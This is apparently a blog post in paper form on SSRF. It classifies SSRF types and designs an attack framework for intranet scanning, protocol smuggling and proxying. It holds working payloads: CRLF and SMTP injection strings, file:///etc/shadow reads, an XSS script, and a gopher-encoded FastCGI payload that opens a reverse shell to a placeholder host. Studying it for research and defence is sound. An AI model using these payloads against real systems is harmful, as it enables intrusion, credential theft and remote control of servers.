All you need to know about SSRF and how may we write tools to do auto-detect

19 minute read

Ah… Forgot to post it on my blog

Abstract

Server Side Request Forgery (SSRF) is known to every security researcher for a long time. However, because its exploitation always depends on the vulnerabilities in the intranet rather than the target itself, its damage is ignored by many researcher. The ignorance leads to the lack of SSRF attack tools. But we should not belittle this attack, there are many examples of gaining intranet control through SSRF (For example, Wooyun identifier: WooYun-2015–0163792, WooYun-2015–099070). To help security research utilizes the vulnerability, this research would propose details to implement a SSRF attack framework.

Keywords: Server Side Request Forgery, attack framework, intranet, vulnerabilities

Summary: This paper proposes detailed implement of every process: SSRF probe, Intranet host/port scanning, supported protocol probe, and automatic exploitation. I will use a server to record HTTP request, which helps me to ensure if a server visits the specified site. Additionally, we will present how to use SSRF as a proxy. In a proxy mode, attacker can compose other tools like W3af, sqlmap, and Burpsuite. With the above features, we can release the full power of SSRF.

1 Introduction

1.1 Brief introduction of Server Side Request Forgery

Imagine you have a worker who helps you carry goods from the factory. If the worker does not check whether the good belong to you, you can ask him/her to bring out others’ goods. The servers with Server Side Request Forgery (also known as SSRF or XSRF) vulnerability just act like those careless workers. They typically help user to fetch files or images, but would not check the destination. So, attacker can ask the server to give back resource from the private network. Thus, the server might become the proxy of attacking intranet. Hacker can utilize it to bypass firewall or NAT to enter private network, as a result, the vulnerabilities (e.g. PHP Fast-CGI unauthorized request, which allows user to execute PHP code) in private network might be exploited. Otherwise, hackers might use protocol like file:// to achieve local system’s files(e.g. /etc/passwd, which stores password in Linux operation system) ,or DDoS (Den of Service) internal network. Here is a picture to illustrate how SSRF works [1]:

Figure 1: SSRF illustration

To be more concrete, we can imagine there is a server will fetch an image for us. Consider the following code:

<?php if (isset($_POST['url'])) {
    $content = file_get_contents($_POST['url']);
    $filename ='./images/'.rand().';img1.jpg';
    file_put_contents($filename, $content);
    echo $_POST['url'];
    $img = "<img src=\"".$filename."\"/>"; }
    echo $img;
?>

User will send a URL via POST method, and the server fetches the image and displays it. What if we send an intranet address to the server to it? We can get the content in private network from the returned image! In this way, we can bypass firewall. Despite some special cases (file protocol, PHP protocol), SSRF won’t influence the vulnerable itself. Alternatively, hacker uses it as a jump server to access private network. Thus, the vulnerabilities in intranet determine the damage of one SSRF attack.

1.2 Current Problems

Consequently, to utilize SSRF, you need to detect the internal network. What’s worse, if the response merely contains HTTP status rather than detailed content, it’s difficult for us to exploit the attack without any tools. Unfortunately, there is no killer application in current SSRF exploitation software. Even Skanda [3], a SSRF exploitation tool provided by OWASP ( Open Web Application Security Project), merely supply limited functions including detecting SSRF vulnerability and scanning local ports.

Yin Wang, also known as ringzero, has proposed SSRF automatic exploitation technique in Wooyun summit 2016. He only mentioned the possible scene that might occur SSRF and the current vulnerabilities available to be applied in SSRF attack. But his report neglected the importance of information gathering and protocol smuggling. This is far from enough. As an attacker, we need to know the information as much as possible, such as all the living IP addresses in the internal network. In some cases, the server with SSRF might only indicate whether the URL is reachable, therefore, we need to find some ways to gather their fingerprints (sensitive data that might leak the information (such as operation system, web framework) of a server, to use correct payloads (a special request that allow attacker to control the server or get protected data) . When the server is able to give us the response from private network’s host, we want to use better tools to scan intranet. Then, our SSRF can be set as a proxy to transfer data from scanner to target. What’s more, SSRF might be used as an anonymous agent to help us attack other server and hide own footprints. To implement such functions, we need to create a new SSRF framework. And there are many questions left to us: how can we get the intranet layout fastest, how do get the most precise fingerprints when server merely do not give us content from other hosts, and what protocol we can use to maximize our attack surface? In the remaining chapter, I would propose an overall introduction about my design and use some tricks to solve the mentioned problems.

2.Method

2.1 Classification of SSRF

Before we enter the topic of exploitation, we need to classify SSRF and find out each type’s property. After observing many cases, we separate SSRF to five types: content based, bool based, error based, blind based, and special SSRF. Different type of SSRF has distinctive damage degree. And those types can be assorted to two cases — direct or indirect SSRF.

2.1.1 Direct SSRF

Attackers can confirm whether server has visited an address by the first three types of SSRF. The first term, content based, means that the body of server’s response would contain the content of the URL you specified. Bool based SSRF [4] would not return content, it merely contain the HTTP status code. When the specified URL is unreachable, the server would send back a status code, such as 404 (Web page not found), 500 (Server has internal error), to tell clients that the URL is invalid to request. Because we can directly know which URL the server has visited and the unreachable URL, these three are easier for scripts to detect automatically. Content based and error based SSRF are exploitable in most cases.

2.1.2 Indirect SSRF

Not all the servers will contain error code when the destined host is down , but one thing in common is that they will keep trying many time before connection is closed. Thus, we can use the difference in time to confirm whether a host is alive: when the server takes much longer time to response, we can infer that the specified host is not up. Blind based SSRF is the most difficult type to exploit, because attackers cannot know if he or she sends payloads successfully. Special type refers to those uncommon SSRF. For example, a server might return “true” in the body of response when sending request successfully, otherwise, it gives us a “false”. This seems like an error based SSRF, but they are totally different. However, this example only happens in ideal environment. In a real network, it’s highly possible that we need to filter out some noise made by the server in response’s body. For instance, it might send back JSON in following format:

{"url":"example.com", "acces":"false"}

So, we need to confirm the part reflecting server status and filter a whole lot data. Error based SSRF, however, would merely give us HTTP status code, which is in a fixed range. What’s worse, some might include variable data like current time in their HTTP body. As a result, filtering will be an extremely difficult task for out program. To solve the problem, I will mention a technique called “tamper”, which allows attackers to apply own method to filter data according to their requirements. Time based and blind SSRF are almost unexploitable, because we can not estimate if our requested URL is reachable. Content based SSRF, however, needs user to implement “tamper” (mentioned later) to help framework know if a URL is reachable.

2.2 Probe SSRF

Before exploiting, we need to whether a server has SSRF. For most cases, attacker specifies URL as the payload, sending it to the target through HTTP GET parameter or HTTP POST data (we will use the term ‘SSRF vector’ to refer them in the remaining article). We will replace every parameters to the specified URL and test the response. Please notice that our payload should be URL encoded, on the other hand, its special characters (such as ‘?’ and ‘#’) might cause our request malfunction. For instance, if the target had SSRF in URL http://target.com/?u=xxURLxx, and the xxURLxx is the SSRF vector. When we want it to connect http://example.com/?id=1&allow=yes and replace it to xxURLxx, the request becomes: http://target.com/?u=http://example.com/?id=1&allow=yes. So, the server will receive two parameters: id and allow (RFC 3986). Of course, if security researcher has identified SSRF manually, they can state the place of SSRF vector by specifying xxURLxx in GET parameter or POST data.

2.2.1 Basic Probe

We have introduced the assortment of SSRF, in this chapter, we will identify method of probing this vulnerability. Basic probe only indicate whether a server has SSRF, but won’t classify its type. We set up several servers and enable wildcard DNS and HTTP records. The attack framework would ask target to send several request to our server, and the domain follow such format: <a 10 digital random number>.ourdomain.net . The ten digital number is a unique id for our target, we will match it with our server’s record to identify a server. If the target does visit to our site, its DNS record and HTTP request will be stored. Then, the framework will connect to our server and use the random number to check whether our target has visited to it.

2.2.2 Advanced Probe

After the finishing previous process, attacker can use advanced probe helps security researcher to identify the specific type of SSRF. At the beginning, our framework will send invalid URL ( malformed schema, invalid address, unreachable port, and etc.) to detect whether server will response error code. After the process, we will give invalid address as the target of server’s request. Readers should notice that detecting error-based needs to be prior to the time-based. We found that some error based SSRF would also spend a lot of time when connecting to unreachable port before responding an error code. Thus, it’s necessary to detect error based SSRF first. To confirm a content based SSRF, our framework would ask the server to retrieve a specific file in our server. Once the returned data includes the whole content in the file, we can confirm the SSRF is content based.

2.3 Scan the Intranet

One of the most crucial function for SSRF is attacking the Intranet. Before we exploit it, we need to know the running hosts and their address. The private IP segments ranged from 10.0.0.0 –10.255.255.255, 172.16.0.0–172.31.255.255 , to 192.168.0.0–192.168.255.255 (RFC 1918), which have more than 17000000 IPs. However, user can utilize DNS zone transfer or find leaked information. But such tasks are not easy to be done automatically, we need user to exploit them himself/herself. Requesting the target to access IP one by one is an impossible task. Thus, our scanner merely detect single IP or a network segment specified by user. To increase the speed, we scan a list of common ports occupied by common application rather than all ports. Here is part of our ports (the upper one is port number, the lower one is correspondent service name):

Port Service
22 SSH
80 Http Server
443 HTTPS

Besides popularity, we will consider whether a service supports text-based protocols. If it does, it will be easier for us to customize server’s request (The reason will be mentioned in chapter 2.4).

Protocols can extent the attack surface of SSRF. The most classical example is using file protocol to retrieve password directly (e.g. file:///etc/shadow). What’s more, attackers can utilize gopher protocol to compose arbitrary text based request [5]. Thus, finding out supporting protocols is important for exploiting targets. Here is a list of exploitable protocol concluded by Yin Wang [6]:

file:// — Accessing local filesystem
http:// — Accessing HTTP URLs
ftp:// — Accessing FPP URLs
php:// — Accessing values I/O stream
data:// — Data Protocol(RFC 2397)
phar:// — PHP Archive
gopher:// — A protocol designed for dictionary based menu
dict:// — Dictionary Protocol

Figure 3: Example protocols

However, not all the protocols can attacker apply. Some might be filtered by the firewall, other might not support by programming language. How do we match port with its protocol? Basically, we can change the schema of URLs and inspect the response (HTTP status code, time, and response body) from the server, and our SSRF vector becomes the following format:

<current schema>://url:ports

If the the response code is normal in error-based SSRF; or filled with context in context-based SSRF, we can confirm whether a protocol is supported by the host. Detecting all the supported schema for every port is inefficient. Thus, we would match a port with its default protocol first, (e.g. HTTP matches port 80, ftp matched port 24). After that, our framework tests the remaining protocols.

2.4 How to Send Custom-Build Request

In the previous part of the paper, I have mentioned that SSRF enables us to let target send request to a specific URL and return response to us. We can simply use the server to send GET request. However, we can merely control the URL, the remain parameters (e.g. cookies, user-agent, and post data) are generated by server. Unfortunately, we need to add or modify these parameters in some cases. For instance, a CMS (Content Management System) in the intranet has SQL injection vulnerability when parsing the header of a HTTP request. What we control is merely the URL, how can we add header? CRLF injection [7] will be quite useful here. CRLF injection allows us to send Carriage-Return (ASCII 13, \r) Line-Feed (ASCII 10, \n), which is used to terminate a line of HTTP request. Moreover, each parameters is separated line by line in a HTTP response.

2.4.1 Using CRLF injection to add HTTP parameter

By injecting encoded CRLF to URL, we can add new parameters to server side’s request. We will use the picture to illustrates the process :

//Attacker's request
GET ?url=http://example.com/%0d%0aRefeerer:localhost
Host:www.target.com
...

//Server's request
GET http://example.com
Referer:localhost
...

Figure 4: Add parameters by CRLF injection

Imagine that www.target.com has SSRF vulnerability, we ask it to visit URL http://example.com/%0d%0aRefeerer:localhost. In this URL, %0d%0a is the URL encoded charsets of CRLF. When the server is parsing the URL, %0d%0a will be automatically decoded to carriage-return and line-feed symbols. Thus, we get a new line with our custom-build parameter (the Referer). This phenomenon happens in all decoding process that lack of checking characters. CRLF is not all-purpose, some server might not parse URL encode, while the other will filter out CRLF characters. To detect CRLF, we place a CRLF followed by random number at the end of our server’s URL and ask our target to request the special URL. Once we found additional CRLF and previous random number, we can ensure if it has CRLF injection. Despite CRLF injection in HTTP, we can utilize other protocols to construct more powerful payload, which will be mentioned in 2.8.3 .

2.4.2 Use CRLF injection to smuggle other protocols Exactly, we can smuggle one protocols to transform them to different protocols. Orange Tsai has provided a list of protocols that are suitable to smuggle [9], which include:

HTTP Based:Elastic, CouchDB, MongoDB, Docker Text-based protocol

Text Based:FTP, SMTP, Redis, Memcached

These protocols enable attackers to transform them to exploitable protocols by adding encodes. For example, if there is a SMTP server without authentication in the intranet, we can construct following SSRF vector:

https://address%0D%0AHELO evil.com%0D%0AMAIL FROM...:25/`

The SMTP would receive:

GET /
HOST:address:25
HELO evil.com
MAIL FROM...

Although the first two lines are invalid for SMTP protocols. But the next two line will make the server send forged mail (use forged identification evil.com in mail). When we received the mail with the forged identification, we can assume that the port is open and occupied by a SMTP server.

2.5 Content Based SSRF Exploitation

Content based SSRF provides attackers the clearest view of what server retrieve. Thus, we can get the fullest fingerprints of the Intranet. From server’s response, security researcher may manually find out SQL injection, remote commands execution, and so on. But implement every vulnerabilities testing tools in our framework is a time consuming job, it also betrays the rule of K.I.S.S (Keep It Simple, Stupid). Thus, our framework forwards data to existing vulnerability exploitation tool, which acts like a proxy.

2.5.1 SSRF proxy

HTTP has five method: GET, POST, HEAD, TRACE, PUT, DELETE, OPTIONS, and CONNECT. Normally, it’s only possible to let server use GET method by specifying a URL. When the request body in POST method merely contains parameters, GET and POST request are transferable, although it’s still possible to be rejected by certain servers. How could we support as many parameters as possible? One way is CSRF injection, but it might cause HPP (HTTP Parameter Pollution ). For instance, if the server has a specific user agent to request web sites, and we want to add own user agent, it will emerge following consequence (parameter u is a SSRF vector):

//Attacker's request
GET ?url=http://example.com/%0d%0aUser-Agent:Chrome
Host:www.target.com

//server's request
GET http://example.com
user-agent:Chrome
user-agent:Python URLlib

Figure 5:Add UA through CRLF

Some server might reject HPP request, while other accept. After extending request method and parameters, we can set HTTP proxy for other tools. Face to large amount of requests, we decide to enable multi-thread to handle requests.

2.5.2 Debate: Whether we should filter data from the proxy

In many cases, the target would not return the same data when they fetch response from SSRF vector. Consider following code:

<?php
{
$content = file_get_contents($_GET['url']);
echo 'We visited: '.$_GET['url'];
}
echo $content;
?>

Figure 6: Sample PHP code

The response would not only return content, but an extra line We visited: . This line is not supposed to be occurred from the SSRF vector’s response. Those tools using our proxy might not get the most accuracy response, but we still believe that it’s necessary to keep these extra context. Extra context typically brings us extra attack surface. Let’s look back Figure 6. The page will echo a user-controlled data without filtering. And this cause a reflected XSS. Attacker can put ```http://evil.com/%3Cscript>alert(1)%3e/script>``` to validate it. To conclude, eliminating extra contexts is not good for discovering extra attack surface.

2.6 Error Based SSRF Exploitation

Attacker cannot get content from error based SSRF. Consequently, it is unlikely to use other tools helping us get data. What we only know is whether the server has successfully accessed a URL. It means that neither can we use vulnerabilities in response bodies nor the interactive payloads. Therefore, only by requesting specific path can we infer the Web service or framework. These paths are unique in different Web framework or service. For instance, if we can access path /jmx-console/ , /invoker/JMXInvokerServlet, the host has a high possibility of running JBOSS. If we can confirm a host’s framework, it give us a chance to use a public payloads to attack it. However, the payload can only be GET or POST method, otherwise we cannot send correct request. And during the exploiting process, the payload does not need to use content from the server’s response. Although we give a whole lot restrictions, there are still many exploitable payloads in error based SSRF [8]:

Bug ID Description
S2–045 Struts Deserialization Vulnerability
PACKETSTORM:131185 JBoss JMXInvokerServlet Remote Command Execution

Figure 7: Sample vulnerabilities

Of course, these payloads can also be applied to context based SSRF. Although server cannot send back context it self, we can use let the server do DNS or HTTP request to take out data from the vulnerable server.

2.7 Using Non-HTTP Protocols to Exploit

2.7.1 File Protocol

We have detected a number of protocols in the previous part. Besides hacking the Intranet, SSRF give us chances to access server’s file system directly. We can try fetching /etc/passwd and /etc/shadow. Moreover, attackers can access /proc to get other sensitive information like running application, machine hardware details, and so on. The SSRF attack framework stores a list of the location of sensitive files, and uses them as SSRF vector to get as much information as possible.

2.7.2 Gopher Protocol

Composing gopher and SSRF is like giving attacker a proxy with few restriction. Gopher gives attackers maximum extent of interacting different protocols, because it accepts URL encode (so it’s possible to have CSRF injection) and does not have any headers or response body (there won’t be any HPP). If we find text based protocol like Redis or Fast-CGI, we can construct special gopher request to attack them. For instance, if our scanner detects a Fast-CGI service in the port 9000 of intranet host 192.168.0.5. Then, we can use following payload in our SSRF vector:

gopher://192.168.0.5:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%10%00%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR192.168.0.5%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH97%0E%04REQUEST_METHODPOST%09%5BPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Asafe_mode%20%3D%20Off%0Aauto_prepend_file%20%3D%20php%3A//input%0F%13SCRIPT_FILENAME/var/www/html/1.php%0D%01DOCUMENT_ROOT/%01%04%00%01%00%00%00%00%01%05%00%01%00a%07%00%3C%3Fphp%20system%28%27bash%20-i%20%3E%26%20/dev/tcp/YourHost/2333%200%3E%261%27%29%3Bdie%28%27-----0vcdb34oju09b8fd-----%0A%27%29%3B%3F%3E%00%00%00%00%00%00%00

It’s obvious that manually constructing a payload is complicated. The attack framework helps attacker generate and encode payloads by auto-encoding, keyword replacing, and vulnerabilities detecting.

3 Result and Discussion

We use several Python Libs (socketsever, urllib, httpserver, random, time, re ) to implement the tool. It can detect and exploit properly as previous chapter proposes. However, the proxy will delay 1 second more than the direct request, this might prolong the scanning time for scanners. Also, the collected fingerprints are limited, some vulnerabilities might be missed in the intranet ,we still need to spend time expanding fingerprint lib.

Now, we merely finish a HTTP based SSRF attack framework. In other cases that might occur SSRF, like XML parsing engine or database, we have not created a tool to support their exploitation. These special SSRF require us to use different encodes. Time based SSRF and blind SSRF can only give us limited information, we do not have an appropriate method to exploit them yet. Furthermore, we need to design API (Application Interface) for secondary development to meet different purposes. Our framework cannot recognize charsets automatically. When the response from SSRF vector needs specific charset to be displayed, browser using the proxy will show messy codes, which interfere us finding leaked information. Despite SSRF from servers, browser [10] and reverse proxy [11] have such bugs, too. We haven’t discussed them, yet. Constructing attack framework for them will be totally different (e.g. You need to change the DNS record to trick target connecting to intranet address).

4 Conclusion

In this paper, we analyze different types of SSRF and methods to exploit them. What’s more, each chapter also reminds readers some possible problems such as encoding. The framework aims to help security researcher find and utilize SSRF in a simpler way. We believe more SSRF vulnerabilities will be eliminated by this tool.

Reference

  • [1] Freebuf. SSRF Attack Analyze. http://www.freebuf.com/articles/web/20407.html (2013)

  • [2] Infosec Institute. The SSRF vulnerabilities. http://resources.infosecinstitute.com/the-ssrf-vulnerability (2016)

  • [3] OWASP. OWASP Skanda SSRF Exploitation Framework. https://www.owasp.org/index.php/OWASP_Skanda_SSRF_Exploitation_Framework (2013)

  • [4] Wulala. Thinking and Practice of Bool Based SSRF. http://www.secevery.com:4321/drops/web-7550.html (2015)

  • [5] Zheng R. Use Gopher Protocol to Extent Attack Surface. (2016)

  • [6] Wang Y. How to Construct Your SSRF Exploit Framework, page 36. Wooyun Summit 2016. (2016)

  • [7] Prasad P. CRLF Injection/HTTP Response Splitting Explained. https://prakharprasad.com/crlf-injection-http-response-splitting-explained/ (2011)

  • [8] Wang Y. How to Construct Your SSRF Exploit Framework, page 47, 48. Wooyun Summit 2016. (2016)

  • [9] Tsai O. A New Era of SSRF — Exploiting URL Parser in Trending Programming Language. Black Hat 2017. (2017)

  • [10] mgpn. Bypass Same Origin Policy. https://github.com/mpgn/ByP-SOP (2016)

  • [11] Kattle J. Cracking the Lens: Targeting HTTP’s Hidden Attack-Surface. http://blog.portswigger.net/2017/07/cracking-lens-targeting-https-hidden.html. Black Hat 2017 (2017)

Leave a comment